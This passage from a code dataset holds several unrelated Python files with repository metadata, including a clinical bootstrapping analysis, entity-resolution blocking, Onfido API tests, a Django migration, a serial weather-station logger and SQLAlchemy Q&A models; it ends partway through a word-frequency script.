    parser.add_argument("--svdr",default="HR_Analysis/")
    parser.add_argument("--outfile",default="3class_bootstrapping.txt")
    args = parser.parse_args()
    sd = args.svdr
    if os.path.exists(sd):
        pass
    else:
        os.makedirs(sd)
    ## generates log of output: every print() below goes to the log file
    stdoutOrigin=sys.stdout
    sys.stdout = open(str(sd+args.outfile),'w')
    print('Analysis generated on: ')
    print('Data file: '+args.df)
    print(datetime.now())
    print('plots saved in: '+sd)
    print('Prob cutoff: 0.3')
    # Import clinical data; keep only patients with >2 years of follow-up
    clin_dat = pd.read_csv(args.clin_dat)
    clin_dat['Follow up: years'] = clin_dat['Duration of follow up (days)']/365
    clin_dat=clin_dat.loc[clin_dat['Follow up: years']>2]
    # patients reaching ESRD within 14 days of biopsy become outcome class 2
    clin_dat.loc[clin_dat['Time to ESRD (days)']<14,'ESRD on dialysis, transplant or cr >6 (no = 0, yes = 1)']=2
    print('Restricted to 2 year follow up')
    # import cell features, clean data
    all_cells = MakeCellDF(args.df, clin_dat, 0.3)
    ### How many ROIs per ESRD+ vs -
    ROI_list=pd.DataFrame(all_cells.Case.unique(),columns=['Case'])
    ROI_list['Accession #']=ROI_list['Case'].apply(Extract_acc)
    ROI_list= ExtractfromClin(clin_dat,ROI_list,'ESRD on dialysis, transplant or cr >6 (no = 0, yes = 1)','ESRD')
    print('# ESRD + vs - ROIs')
    print(ROI_list.groupby('ESRD').count())
    feat_list=['CD3+CD4+','CD3+CD4-','CD20+','BDCA2+','CD11c+']
    Cell_type_countsbyROI = CellCountsbyROI(all_cells,feat_list, clin_dat)
    ### Randomly sampling from ROIs in each category
    print('Bootstrap by ROI')
    if os.path.exists(os.path.join(sd,'Bootstrap_byROI_3class'))==True:
        pass
    else:
        os.makedirs(os.path.join(sd,'Bootstrap_byROI_3class'))
    # per-biopsy ROI counts; appears unused after this point -- kept as-is
    Acc_list=ROI_list.groupby('Accession #').count()['Case']
    Acc_list=Acc_list.reset_index()
    Acc_list= ExtractfromClin(clin_dat,Acc_list,'ESRD on dialysis, transplant or cr >6 (no = 0, yes = 1)','ESRD')
    n_iter=1000
    sample_n=150
    for feat in feat_list:
        feat_bs,interp=threeclassbootstrap_meanCI(Cell_type_countsbyROI,ROI_list,feat,n_iter,sample_n)
        textargs={'size':'16','fontname':'Times New Roman'}
        # histogram of the bootstrapped group means (blue/orange/green = ESRD 0/1/2)
        plt.clf()
        fig=plt.figure(figsize=(5.5,5),frameon=False)
        ax=fig.add_axes([0.15,0.15,0.75,0.75])
        ax.spines['top'].set_visible(False)
        ax.spines['right'].set_visible(False)
        ax.hist([feat_bs['mean0'],feat_bs['mean1'], feat_bs['mean2']],color=['blue','#fc9003','green'], bins=50)
        plt.xticks(fontsize=14,fontname='Times New Roman')
        plt.yticks(fontsize=14,fontname='Times New Roman')
        plt.ylabel('Number of Samples',**textargs)
        plt.xlabel('Mean '+feat+' per ROI',**textargs)
        plt.savefig(sd+'Bootstrap_byROI_3class/'+'Means_'+feat+'.png')
        plt.show()
        # histogram of the pairwise differences of group means
        plt.clf()
        fig=plt.figure(figsize=(5.5,5),frameon=False)
        ax=fig.add_axes([0.15,0.15,0.75,0.75])
        ax.spines['top'].set_visible(False)
        ax.spines['right'].set_visible(False)
        ax.hist([feat_bs['d01'],feat_bs['d02'],feat_bs['d12']],color=['purple','cyan','yellow'], bins=50)
        plt.xticks(fontsize=14,fontname='Times New Roman')
        plt.yticks(fontsize=14,fontname='Times New Roman')
        plt.ylabel('Number of Samples',**textargs)
        plt.xlabel('Difference in mean '+feat+' per ROI',**textargs)
        plt.savefig(sd+'Bootstrap_byROI_3class/'+'Diff_means_'+feat+'.png')
        plt.show()
        print('Avg mean '+feat+'for ESRD-: '+str(feat_bs['mean0'].mean())+' '+str(interp['CI_0']))
        print('Avg mean '+feat+'for ESRD+: '+str(feat_bs['mean1'].mean())+' '+str(interp['CI_1']))
        print('Avg mean '+feat+'for ESRDcurrent: '+str(feat_bs['mean2'].mean())+' '+str(interp['CI_2']))
        print('Avg diff means '+feat+'for ESRD- vs ESRD+: '+str(feat_bs['d01'].mean())+' '+str(interp['CI_d01']))
        print('Avg diff means '+feat+'for ESRD- vs ESRDcurrent: '+str(feat_bs['d02'].mean())+' '+str(interp['CI_d02']))
        print('Avg diff means '+feat+'for ESRD+ vs ESRDcurrent: '+str(feat_bs['d12'].mean())+' '+str(interp['CI_d12']))
    # restore the real stdout
    sys.stdout.close()
    sys.stdout=stdoutOrigin
if __name__=='__main__':
    main()
| UTF-8 | Python | false | false | 11,562 | py | 52 | ss_lupus_statschecks_3classBootstrapping.py | 43 | 0.621519 | 0.589604 | 0 | 256 | 44.148438 | 203 |
Decoder996/entity_resolution | 7,095,286,019,901 | b2f08d89bb9cb04e2d046d160477125f492205d9 | cdc770bb64d90010f503df093436403395d54896 | /python/blocking.py | 51c5ccd01cef3fbb6cea673161eb79619d9b30a7 | [
"MIT"
]
| permissive | https://github.com/Decoder996/entity_resolution | 5a43f5f5f95ba7cd281ce9489e6e5f9bee1694ce | 4fe98701422bbceebc0dfbfc2733add2b9695f2a | refs/heads/master | 2023-05-24T20:57:29.800001 | 2015-10-02T18:49:49 | 2015-10-02T18:49:49 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
This is the blocking scheme used to make Entity Resolution computationally scalable.
"""
import numpy as np
from itertools import izip
__author__ = 'mbarnes1'
class BlockingScheme(object):
def __init__(self, database, max_block_size=np.Inf, single_block=False):
"""
:param database: RecordDatabase object
:param max_block_size: Integer. Blocks larger than this are thrown away (not informative & slow to process))
:param single_block: Boolean, if True puts all records into a single weak block
"""
self._max_block_size = max_block_size
self.strong_blocks = dict()
self.weak_blocks = dict()
if not single_block:
self._generate_strong_blocks(database)
self._generate_weak_blocks(database)
self._clean_blocks()
self._complete_blocks(database.records.keys())
else:
self._max_block_size = np.Inf
self.weak_blocks['All'] = set(database.records.keys())
def _complete_blocks(self, keys):
"""
Finds ads missing from blocking scheme (due to sparse features), and ads them as single ads to weak blocks
:param keys: List of all the record identifiers that should be in the clustering
"""
used_ads = set()
for _, ads in self.strong_blocks.iteritems():
used_ads.update(ads)
for _, ads in self.weak_blocks.iteritems():
used_ads.update(ads)
missing_ads = set(keys)
missing_ads.difference_update(used_ads)
for ad in missing_ads:
block = 'singular_ad_' + str(ad)
self.weak_blocks[block] = {ad}
def _clean_blocks(self):
"""
Removed blocks larger than max_block_size
"""
toremove = list()
for block, ads in self.strong_blocks.iteritems():
blocksize = len(ads)
if blocksize > self._max_block_size:
toremove.append(block)
for remove in toremove:
del self.strong_blocks[remove]
toremove = list()
for block, ads in self.weak_blocks.iteritems():
blocksize = len(ads)
if blocksize > self._max_block_size:
toremove.append(block)
for remove in toremove:
del self.weak_blocks[remove]
def number_of_blocks(self):
"""
Determines the total number of blocks
:return num_blocks: The total number of weak and strong blocks
"""
num_blocks = len(self.weak_blocks) + len(self.strong_blocks)
return num_blocks
def _generate_strong_blocks(self, database):
self._generate_blocks('strong', self.strong_blocks, database)
def _generate_weak_blocks(self, database):
self._generate_blocks('weak', self.weak_blocks, database)
@staticmethod
def _generate_blocks(block_strength, blocks_pointer, database):
"""
Generates the blocking scheme [block_name, set of ad indices in block]
:param block_strength: String 'weak' or 'strong'
:param blocks_pointer: Blocks to mutate, either self.strong_blocks or self.weak_blocks
:param database: RecordDatabase object
"""
to_block = list()
for index, (strength, blocking) in enumerate(izip(database.feature_descriptor.strengths,
database.feature_descriptor.blocking)):
if (strength == block_strength) & (blocking == 'block'): # did user specify blocking for this feature?
to_block.append(index)
for record_id, record in database.records.iteritems(): # loop through all the records
print block_strength, 'blocking ad', record_id
for index in to_block:
feature_name = database.feature_descriptor.names[index]
for subfeature in record.features[index]:
feature = feature_name + '_' + str(subfeature)
if feature in blocks_pointer:
blocks_pointer[feature].add(record_id)
else:
blocks_pointer[feature] = {record_id} | UTF-8 | Python | false | false | 4,194 | py | 36 | blocking.py | 25 | 0.594897 | 0.594659 | 0 | 100 | 40.95 | 119 |
zk040377/load2python | 16,192,026,740,302 | 7e0b63305d41406468c3b05acdc294258018c883 | 546fda8ea4c37dd9b633ab2fb81ae18987085bb6 | /用Python玩转数据/3.2-exercise.py | edaa2350bc1cb2665e704287054e0beca5e2c851 | []
| no_license | https://github.com/zk040377/load2python | a454addb9465848b5408685498eee25cb198140d | 82eab48182fcfdf16450e0b66e81377d2f4a7385 | refs/heads/master | 2022-01-08T04:57:58.551691 | 2018-10-17T06:44:53 | 2018-10-17T06:44:53 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding:utf-8
import numpy as np
from pandas import Series, DataFrame
# NumPy: row indexing and aggregation (Python 2 print statements throughout)
a = np.array([(1, 2, 3), (4, 5, 6), (7, 8, 9)])
print a[2].sum()  # third row: 7 + 8 + 9 = 24
print sorted(set('You need Python.'))  # unique characters, sorted
# pandas Series comparison with equals()
sa = Series(['a', 'b', 'c'], index = [0, 1, 2])
sb = Series(['a', 'b', 'c'])
sc = Series(['a', 'c', 'b'])
print sa.equals(sc)  # element order differs between sa and sc
print sb.equals(sa)
# Build a DataFrame and attach a new column from a Series
data = {'language': ['Java', 'PHP', 'Python', 'R', 'C#'],
        'year': [ 1995 , 1995 , 1991 ,1993, 2000]}
frame = DataFrame(data)
frame['IDE'] = Series(['Intellij', 'Notepad', 'IPython', 'R studio', 'VS'])
print frame['IDE']
aList = ['VS','Sublime']
print 'VS' in frame['IDE'] # frame['IDE'] is a Series; `in` tests its index, not its values
print 'VS' in aList | UTF-8 | Python | false | false | 662 | py | 206 | 3.2-exercise.py | 178 | 0.564024 | 0.512195 | 0 | 23 | 27.565217 | 75 |
daaain/onfido-python | 6,674,379,221,572 | c2b65c067165acfd08a144f6c0bb41c262ed6a06 | e1d141ea82b489ba581d6df68bfe68431e901e2d | /tests/test_checks.py | c595f4f7feb9f5fdea9204bb66c1f48be6326222 | [
"MIT"
]
| permissive | https://github.com/daaain/onfido-python | 5283f418110dc77d3c8089ed545975293c8cc0ff | 62675c97cf7d03de2ab3ed4b07ec0bde9e2b1a5d | refs/heads/master | 2022-12-01T23:47:32.090799 | 2020-08-12T12:58:31 | 2020-08-12T12:58:31 | 288,395,465 | 0 | 0 | NOASSERTION | true | 2020-08-18T08:12:19 | 2020-08-18T08:12:19 | 2020-08-12T12:59:23 | 2020-08-12T12:59:20 | 830 | 0 | 0 | 0 | null | false | false | import onfido
# Shared fixtures: a client with a placeholder token, a fixed applicant id,
# and the request body used by the create-check test below.
api = onfido.Api("<AN_API_TOKEN>")
fake_uuid = "58a9c6d2-8661-4dbd-96dc-b9b9d344a7ce"
check_details = {
    "applicant_id": fake_uuid,
    "report_names": ["identity_enhanced"]
}
def test_create_check(requests_mock):
    """create() should POST the check payload to the checks endpoint."""
    stub = requests_mock.post("https://api.onfido.com/v3/checks/", json=[])
    api.check.create(check_details)
    assert stub.called is True
    assert stub.last_request.text is not None
def test_find_check(requests_mock):
    """find() should GET the check resource by its id."""
    stub = requests_mock.get(f"https://api.onfido.com/v3/checks/{fake_uuid}", json=[])
    api.check.find(fake_uuid)
    assert stub.called is True
def test_list_checks(requests_mock):
    """all() should GET the checks list filtered by applicant id."""
    stub = requests_mock.get(f"https://api.onfido.com/v3/checks/?applicant_id={fake_uuid}", json=[])
    api.check.all(fake_uuid)
    assert stub.called is True
def test_resume_check(requests_mock):
    """resume() should POST to the check's resume endpoint."""
    stub = requests_mock.post(f"https://api.onfido.com/v3/checks/{fake_uuid}/resume", json=[])
    api.check.resume(fake_uuid)
    assert stub.called is True
| UTF-8 | Python | false | false | 1,061 | py | 16 | test_checks.py | 14 | 0.69934 | 0.678605 | 0 | 32 | 32.15625 | 105 |
Palashnenkoff/YaMDb | 498,216,241,810 | efc297f366c23f9c1607e5b500e315e89d200141 | fd34df978209b29fbedf7836859de6f978deba14 | /reviews/migrations/0002_auto_20210822_0907.py | 6ce6b991a00d5e7d161ab8d25d9fc63490ba63b3 | []
| no_license | https://github.com/Palashnenkoff/YaMDb | 6b2d00a293127d51b3dbc837c66ff00118b5bc18 | a67342d2ce4fbf919a7112c36fd3a61b4cfbec63 | refs/heads/master | 2023-08-27T14:59:50.392946 | 2021-11-03T11:19:18 | 2021-11-03T11:19:18 | 418,856,253 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 2.2.16 on 2021-08-22 06:07
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated schema migration for the reviews app.

    Adds human-readable verbose names to the Comment and Review models and
    their fields, and constrains Review.score to the 1-10 range.
    Auto-generated by Django -- do not hand-edit operations.
    """
    dependencies = [
        ('reviews', '0001_initial'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='comment',
            options={'verbose_name': 'Comment', 'verbose_name_plural': 'Comments'},
        ),
        migrations.AlterModelOptions(
            name='review',
            options={'verbose_name': 'Review', 'verbose_name_plural': 'Reviews'},
        ),
        migrations.AlterField(
            model_name='comment',
            name='author',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to=settings.AUTH_USER_MODEL, verbose_name='comment author'),
        ),
        migrations.AlterField(
            model_name='comment',
            name='pub_date',
            field=models.DateTimeField(auto_now_add=True, verbose_name='date of publication'),
        ),
        migrations.AlterField(
            model_name='comment',
            name='review',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='reviews.Review', verbose_name='comment to review'),
        ),
        migrations.AlterField(
            model_name='comment',
            name='text',
            field=models.TextField(verbose_name='comment text'),
        ),
        migrations.AlterField(
            model_name='review',
            name='author',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reviews', to=settings.AUTH_USER_MODEL, verbose_name='reviews author'),
        ),
        migrations.AlterField(
            model_name='review',
            name='pub_date',
            field=models.DateTimeField(auto_now_add=True, verbose_name='date of publication'),
        ),
        migrations.AlterField(
            model_name='review',
            name='score',
            field=models.IntegerField(validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(10)], verbose_name=' authors mark'),
        ),
        migrations.AlterField(
            model_name='review',
            name='text',
            field=models.TextField(verbose_name='reviews text'),
        ),
        migrations.AlterField(
            model_name='review',
            name='title',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reviews', to='titles.Title', verbose_name='title'),
        ),
    ]
| UTF-8 | Python | false | false | 2,693 | py | 21 | 0002_auto_20210822_0907.py | 18 | 0.60156 | 0.593019 | 0 | 69 | 38.028986 | 172 |
Planet-Moon/Weatherstation | 17,257,178,622,408 | 168532b17a87c476f78a2fe2ebb7ba6ac696d4b0 | 127c9376d2e8fbff8ca2d162670418ebc2357c77 | /ReadSerial_Wetterstation.py | dc3667826dc76d99e39268a39e25b37f831797d0 | []
| no_license | https://github.com/Planet-Moon/Weatherstation | fe4da879f15058a56761eaecdd530b97eaf02ebe | 2c1ddd779939f9a2c24d01b0d5c39be01814fe2a | refs/heads/main | 2023-01-08T06:50:41.596959 | 2020-11-14T13:07:18 | 2020-11-14T13:07:18 | 307,520,109 | 0 | 0 | null | false | 2020-10-31T21:56:59 | 2020-10-26T22:26:21 | 2020-10-31T21:50:34 | 2020-10-31T21:56:58 | 731 | 0 | 0 | 0 | C++ | false | false | #ReadSerial.py
import serial
import time
import platform
import datetime
import struct
import os
import sys
import errno
# Runtime flags -- mutated by check_arguments() via `global`
debug = 0  # 1: print each parsed line and its field count
write_file_flag = 1  # 0: do not append samples to the CSV log
dummyOutput_flag = 0  # 1: only create an example CSV; skip the serial port
output_path = ""  # log directory, set by the -dir= argument
op_sys = platform.system()
print("op_sys: "+str(op_sys))
# NOTE(review): no fallback for other systems (e.g. Darwin) -- `port`
# stays undefined there and serial.Serial(port, ...) below raises NameError
if(op_sys == "Linux"):
    port = "/dev/ttyACM0"
elif(op_sys == "Windows"):
    port = "COM3"
def bytes_to_int(input_bytes):
    """Interpret an iterable of byte values as one big-endian integer."""
    value = 0
    for byte in input_bytes:
        value = (value << 8) + int(byte)
    return value
def ensure_dir(file_path):
    """Create the directory containing file_path if it does not exist yet.

    Tolerates a concurrent creation of the same directory (EEXIST).
    """
    directory = os.path.dirname(file_path)
    if os.path.exists(directory):
        return
    try:
        os.makedirs(directory)
    except OSError as e:
        if e.errno != errno.EEXIST:
            raise
def check_arguments(sys_argv):
    """Parse the command-line flags and mutate the module-level flags.

    Recognised flags: -new, -debug, -nofile, -example, -dir=<path>,
    -help/-h.  Usage lines are printed for every flag that was not given
    (and for all flags when -help is given, after which the script exits).

    NOTE(review): `-new` calls os.remove(logfile), but `logfile` is only
    assigned later inside the acquisition loop, so at this point the name
    does not exist and the call raises NameError -- confirm intended path.
    """
    global debug, write_file_flag, dummyOutput_flag, output_path
    # one slot per recognised flag; 1 = the flag was supplied
    used_arguments = [0,0,0,0,0,0]
    for arg in sys_argv:
        if(arg == "-new"):
            os.remove(logfile)
            print("creating new file...")
            time.sleep(2)
            used_arguments[0] = 1
        if(arg == "-debug"):
            debug = 1
            used_arguments[1] = 1
        if(arg == "-nofile"):
            used_arguments[2] = 1
            write_file_flag = 0
            print("not writing to output file")
        if(arg == "-example"):
            used_arguments[3] = 1
            dummyOutput_flag = 1
            print("creating example output file...")
        if(arg.find("-dir=")==0):
            output_path = arg[arg.find("-dir=")+len("-dir="):] # get all chars in argument after "-dir="
            used_arguments[4] = 1
            print("changed directory of output file to: \""+output_path+"\"")
            if(output_path[-1]!="/"):
                output_path += "/" # check if last char is a "/", if not append one
            ensure_dir(output_path) # check of output_path is a directory, if not create it
        if((arg == "-help") or (arg == "-h")):
            used_arguments[5] = 1
    if((used_arguments[0] == 0) or (used_arguments[5] == 1)):
        print("append argument \"-new\" to create new csv-file, appending existing csv-file")
    if((used_arguments[1] == 0) or (used_arguments[5] == 1)):
        print("append argument \"-debug\" to output debug information")
    if((used_arguments[2] == 0) or (used_arguments[5] == 1)):
        print("append argument \"-nofile\" to not write data to output file")
    if((used_arguments[3] == 0) or (used_arguments[5] == 1)):
        print("append argument \"-example\" to create example output file")
    if((used_arguments[4] == 0) or (used_arguments[5] == 1)):
        print("append argument \"-dir=dirname\" to change directory of output file")
    if(used_arguments[5] == 1):
        exit()
# Parse command-line flags (may mutate the global flags above)
check_arguments(sys.argv)
try:
    if(not dummyOutput_flag):
        ser = serial.Serial(port, baudrate = 9600 )
    else:
        print("Skipped opening serial port")
except:
    # NOTE(review): bare except also hides a NameError for `port` on
    # unsupported operating systems, reporting it as a serial failure
    print("Error opening Serial Port")
    exit()
print("starting")
if(not dummyOutput_flag):
    ser.readline()  # presumably discards a partial first line -- confirm
# Main acquisition loop: one CSV row per serial line, one log file per day
while True:
    date_now = datetime.datetime.now()
    if(not dummyOutput_flag):
        rcv = ser.readline()
        # timestamp fields joined with ';' to match the CSV header below
        date_string = str(date_now.strftime("%Y")) + ";" + str(date_now.strftime("%m")) + ";" + str(date_now.strftime("%d")) + ";" + str(date_now.strftime("%H")) + ";" + str(date_now.strftime("%M")) + ";" + str(date_now.strftime("%S"))
        data_string = rcv.decode()
        data_string = data_string.replace("\t",";")
        data_string = data_string.replace("\n",";")
        output_string = date_string+";"+data_string+"\n"
    example_string = ""
    if(dummyOutput_flag):
        example_string = "example"
    # one log file per calendar day
    logfile = output_path+"Wetterlog"+str(date_now.date())+"_"+example_string+".csv"
    write_mode = "w" #overwrite existing
    append_mode = "a" #append existing
    if(not os.path.exists(logfile)):
        file = open(logfile,write_mode)
        file.write("Year;Month;Day;Hour;Minute;Second;Relative Humidity;Temperature;Atmospheric Pressure;UP;bmp_temperature;Lightintensity\n")
        file.close()
    if(not dummyOutput_flag):
        # count the ';' separators; only rows with exactly 12 are logged
        i = 0
        for pos in output_string:
            #print("pos: "+pos)
            if(pos == ";"):
                i = i + 1
        if((i == 12) and (write_file_flag == 1)):
            file = open(logfile,append_mode)
            file.write(output_string)
            file.close()
        if(debug == 1):
            print("data_string: "+output_string)
            print("number of fields: "+str(i))
    if(dummyOutput_flag):
        print("Created example output file: "+logfile)
exit() | UTF-8 | Python | false | false | 4,616 | py | 8 | ReadSerial_Wetterstation.py | 3 | 0.564991 | 0.55091 | 0 | 141 | 31.744681 | 235 |
camirmas/book-tracker-django | 1,838,246,036,551 | eaab0780ec5bf2f9e46865579515ee7eec8204b7 | 23419b72f2e059a2e98bea8c9ee928608b947fae | /tracker_app/migrations/0001_initial.py | 3f4b1f177cda2cbe186f21cc76a2e006d55a424e | []
| no_license | https://github.com/camirmas/book-tracker-django | 1ba5325d95fbff57de88b15e1359ecfebcc7c1be | 6ab17e70476a55997ba3888ec0d4ccdad5f73158 | refs/heads/master | 2016-05-23T13:23:18.713452 | 2015-04-01T07:52:14 | 2015-04-01T07:52:14 | 33,083,573 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Initial migration: creates the Book and Quote tables for tracker_app."""
    dependencies = [
        # The project user model is swappable, so depend on AUTH_USER_MODEL.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        # A book owned by a user, with citation metadata and reading progress.
        migrations.CreateModel(
            name='Book',
            fields=[
                ('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),
                ('isbn', models.CharField(max_length=13)),
                ('title', models.CharField(max_length=300)),
                ('publisher', models.CharField(max_length=300)),
                ('city', models.CharField(max_length=300)),
                ('year', models.IntegerField()),
                ('author_first', models.CharField(max_length=300)),
                ('author_middle', models.CharField(blank=True, max_length=300)),
                ('author_last', models.CharField(max_length=300)),
                ('mla_citation', models.TextField()),
                ('page_count', models.IntegerField()),
                ('progress', models.FloatField()),
                ('owner', models.ForeignKey(related_name='books', to=settings.AUTH_USER_MODEL)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        # A quote captured from a book, keyed to its page number.
        migrations.CreateModel(
            name='Quote',
            fields=[
                ('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),
                ('description', models.TextField()),
                ('page_number', models.IntegerField()),
                ('book', models.ForeignKey(to='tracker_app.Book')),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
| UTF-8 | Python | false | false | 1,828 | py | 7 | 0001_initial.py | 7 | 0.531729 | 0.520241 | 0 | 48 | 37.083333 | 114 |
julieqiu/python-finances | 2,946,347,612,644 | ef52d86221889ea1688e8d7cb7edd2669df7132e | 6a15ca69993b6db29f8c8f0213ff17e8a4d8b65f | /finances/database/models/db_transaction_classification.py | f37ae90b2be4b829e124ea2b3c5c48447d5f24c7 | []
| no_license | https://github.com/julieqiu/python-finances | aa84de5bcf3dd48fce2b99bd4a63fbe0c4b2acfe | 9e3223ba7e7927f9cceff8b4b331a8781decd78d | refs/heads/master | 2020-03-23T05:49:58.904674 | 2019-01-11T01:25:52 | 2019-01-11T01:25:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from sqlalchemy.orm import relationship
from sqlalchemy import ARRAY, JSON, Integer, Column, String, Text, Boolean, ForeignKey, Numeric, UniqueConstraint
from finances.database.models.base import Base
class DbTransactionClassification(Base):
    """SQLAlchemy model for the ``transaction_classifications`` table.

    Stores a three-level classification hierarchy (l1/l2/l3) together with
    the phrases associated with that classification.  The (l1, l2, l3)
    combination is unique across rows.
    """
    __tablename__ = 'transaction_classifications'
    # No two rows may share the same three-level classification path.
    __table_args__ = (UniqueConstraint('l1', 'l2', 'l3'),)
    id = Column(Integer, primary_key=True)
    l1 = Column(String, nullable=False)  # top-level category
    l2 = Column(String, nullable=False)  # mid-level category
    l3 = Column(String, nullable=False)  # leaf category
    # Phrases tied to this classification (presumably matched against
    # transaction descriptions -- confirm against the matching code).
    phrases = Column(ARRAY(Text), nullable=False)
| UTF-8 | Python | false | false | 569 | py | 91 | db_transaction_classification.py | 62 | 0.727592 | 0.717047 | 0 | 16 | 34.5625 | 113 |
CrazySunix/Spider | 12,953,621,390,298 | 1a7b5cfdc6a197e692a40cee07d6f23f2f706338 | 8b7bce38a9260fd80c9ccb623925c85e5eed8e26 | /58Project/processing.py | 0c8f5f96fac1175e495439dbe22120854e51aefe | []
| no_license | https://github.com/CrazySunix/Spider | bfc6b93fc02a0fdf73d5f4a02f5f1f6715b63286 | d36ce6c6eda20f80baf1d8f92fce31cd823c6ed8 | refs/heads/master | 2020-02-22T07:35:57.892013 | 2017-08-23T08:42:14 | 2017-08-23T08:42:14 | 100,044,189 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from multiprocessing import pool
from page_parsing import get_links_from,url_list,item_info,get_item_info
from channel_extract import channel_list
# url_list / item_info are imported from page_parsing (presumably MongoDB
# collections -- .find() yields documents carrying a 'url' key; confirm there).
db_urls = [item['url'] for item in url_list.find()]
# URLs whose detail pages have already been parsed into item_info.
index_urls = [item['url'] for item in item_info.find()]
x = set(db_urls)
y = set(index_urls)
# Work remaining: listed URLs that have not been scraped yet.
rest_of_urls = x - y
shanmugharajk/QaNet | 6,347,961,694,434 | 524212efeac37e1cd6958ff1713514c723d8e6d6 | 945feb5d2d1cbd9084c04c1ec89187557df64018 | /src/qanet/post/models.py | 1122cd6680a5cdecbdcf24a9763d05fb0c4b768e | []
| no_license | https://github.com/shanmugharajk/QaNet | d4d05e95b4f48fe9de35ebbd5a5ec525c3e01c94 | b088a3b5f3b2f48632aa20b5fcf82640dc02da17 | refs/heads/main | 2021-06-14T00:11:37.683936 | 2021-04-19T02:58:42 | 2021-04-21T03:47:11 | 145,062,733 | 16 | 3 | null | false | 2021-03-08T16:10:45 | 2018-08-17T02:38:15 | 2021-01-03T21:32:06 | 2021-01-21T01:55:28 | 14,019 | 10 | 3 | 1 | Go | false | false | from sqlalchemy import Column, DateTime, ForeignKey, Integer, String, Table
from sqlalchemy.orm import relationship
from sqlalchemy.sql.schema import PrimaryKeyConstraint
from qanet.enums import PostType
from qanet.models import OwnerEditorMixin, TimeStampMixin
from qanet.database.core import Base
# Many-to-many join table linking question posts to their tags.
assoc_question_post_tags = Table(
    "assoc_question_post_tags",
    Base.metadata,
    Column("post_tag_id", String, ForeignKey("post_tag.id")),
    Column("post_id", Integer, ForeignKey("post.id")),
    # Composite primary key prevents duplicate (tag, post) pairs.
    PrimaryKeyConstraint("post_tag_id", "post_id"),
)
class Post(Base, OwnerEditorMixin, TimeStampMixin):
    """A post in the Q&A system (question or answer in one table).

    ``post_type`` distinguishes the kinds (defaults to question) and an
    answer references its question through ``parent_id`` (self-referential
    foreign key).  Owner/editor and timestamp columns come from the mixins.
    """
    id = Column(Integer, primary_key=True)
    post_type = Column(Integer, default=PostType.question)
    points = Column(Integer, nullable=True)
    # Nullable: presumably only questions carry a title -- TODO confirm.
    title = Column(String, nullable=True)
    content = Column(String)
    # Tags attach through the join table; deletes cascade to association rows.
    tags = relationship("PostTag", secondary=assoc_question_post_tags, cascade="all, delete")
    # For an answer: id of the question it belongs to.
    parent_id = Column(Integer, ForeignKey("post.id"), nullable=True)
    # Denormalized counters (presumably maintained by application code).
    answers_count = Column(Integer, default=0)
    accepted_answer_id = Column(Integer, ForeignKey("post.id"), nullable=True)
    bookmarks_count = Column(Integer, default=0)
    # Moderation state: close votes plus who/when closed or deleted the post.
    close_votes = Column(Integer, nullable=True)
    closed_by_user_id = Column(String, ForeignKey("qanet_user.id"), nullable=True)
    closed_date = Column(DateTime, nullable=True)
    deleted_date = Column(DateTime, nullable=True)
    closed_by = relationship("QanetUser", foreign_keys=[closed_by_user_id])
    # Comments are never loaded implicitly (lazy="noload"); fetch explicitly.
    comments = relationship("Comment", lazy="noload")
| UTF-8 | Python | false | false | 1,535 | py | 202 | models.py | 105 | 0.730293 | 0.72899 | 0 | 39 | 38.358974 | 93 |
survivalcrziest/WordFreqCount | 12,635,793,820,944 | 6ba85094d69d81646abaa50d0cbd741f1e347c70 | d7b87091c834e7827264f90062f93213d494866e | /WordFreqCount.py | 9f1389660382e68a632f2cc93cb8a70a249b0bbb | [
"MIT"
]
| permissive | https://github.com/survivalcrziest/WordFreqCount | e68dfdfd2e90f8c8d1c8f0be54b09b985bef9784 | 965e10ecda6131511e15ee281531303729cae9a0 | refs/heads/master | 2020-12-07T01:41:01.596867 | 2016-08-27T22:23:17 | 2016-08-27T22:23:17 | 66,737,477 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# TODO: add search phrases
#
import urllib
from bs4 import BeautifulSoup
from collections import Counter
import os
import re
maxAnalysisCount = 150  # how many top words to examine before filtering
maxOutputCount = 100  # how many filtered words to write per page/year
outFileName = "CraftConfWordFreqTrend.csv"  # aggregated result CSV
commonWordsFileName = "CommonWords.csv"  # comma-separated stop-word list
def readList(input, separator=''):
    """Read non-empty, non-comment lines from the file at path *input*.

    Lines that are blank or start with '#' (after stripping) are skipped.
    With no *separator*, whole stripped lines are returned.  With a
    *separator*, each line is additionally split on it and the stripped,
    non-empty fields are returned instead.

    Note: the parameter name *input* shadows the builtin; kept for
    call-compatibility with the rest of this script.
    """
    retList = list()
    # Text mode: the file is processed as strings, so the original binary
    # mode ('rb') would yield bytes on Python 3 and break the comparisons
    # below; 'r' behaves identically for this data on Python 2.
    with open(input, 'r') as inputFile:
        for line in inputFile:
            outline = line.strip()
            # Skip blanks and comment lines.
            if outline != "" and not outline.startswith("#"):
                if separator == '':
                    retList.append(outline)
                else:
                    for item in outline.split(separator):
                        item = item.strip()
                        if item != "":
                            retList.append(item)
    return retList
def writeHeader(outFileName):
    """Create (or truncate) the CSV result file and write the header row.

